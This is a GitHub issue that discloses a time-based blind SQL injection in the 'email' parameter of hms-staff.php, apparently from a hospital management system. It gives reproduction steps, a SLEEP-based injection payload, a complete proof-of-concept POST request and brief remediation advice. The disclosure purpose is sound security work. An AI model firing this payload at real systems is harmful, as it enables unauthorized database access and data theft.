Skip to content
New issue

Have a question about this project? Sign up for a free GitHub account to open an issue and contact its maintainers and the community.

By clicking “Sign up for GitHub”, you agree to our terms of service and privacy statement. We’ll occasionally send you account related emails.

Already on GitHub? Sign in to your account

SQL Injection vulnerability via the "email" parameter in hms-staff.php #2

Open
khanhchauminh opened this issue Nov 8, 2021 · 0 comments

Comments

@khanhchauminh
Copy link

khanhchauminh commented Nov 8, 2021

Author

KhanhCM (@khanhchauminh)

Version: 1.0

No login is required

Steps to reproduce

  1. Go to Staff Login page
  2. Input username, password and choose Admin in the User Type
  3. Click on the Login button.
  4. Intercept the request and insert the payload in the value of the email parameter.

Example payload:

' AND (SELECT 1 FROM (SELECT(SLEEP(5)))a) AND 'a'='a

Proof-of-concept

POST /hms-staff.php HTTP/1.1
Host: 127.0.0.1:8888
Content-Length: 120
Cache-Control: max-age=0
Upgrade-Insecure-Requests: 1
Origin: http://127.0.0.1:8888
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/85.0.4183.83 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Referer: http://127.0.0.1:8888/hms-staff.php
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.9
Cookie: PHPSESSID=ghpdj0nh826f31malqm7j3dko7
Connection: close

email=admin@example.com'%20AND%20(SELECT%201%20FROM%20(SELECT(SLEEP(5)))a)%20AND%20'a'%3d'a&password=password&type=admin

Response in Burpsuite

image

Source code review

hms-staff.php

image

library.php

image

Remediation

Validate input of email parameter in hms-staff.php.

Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment
Labels
None yet
Projects
None yet
Development

No branches or pull requests

1 participant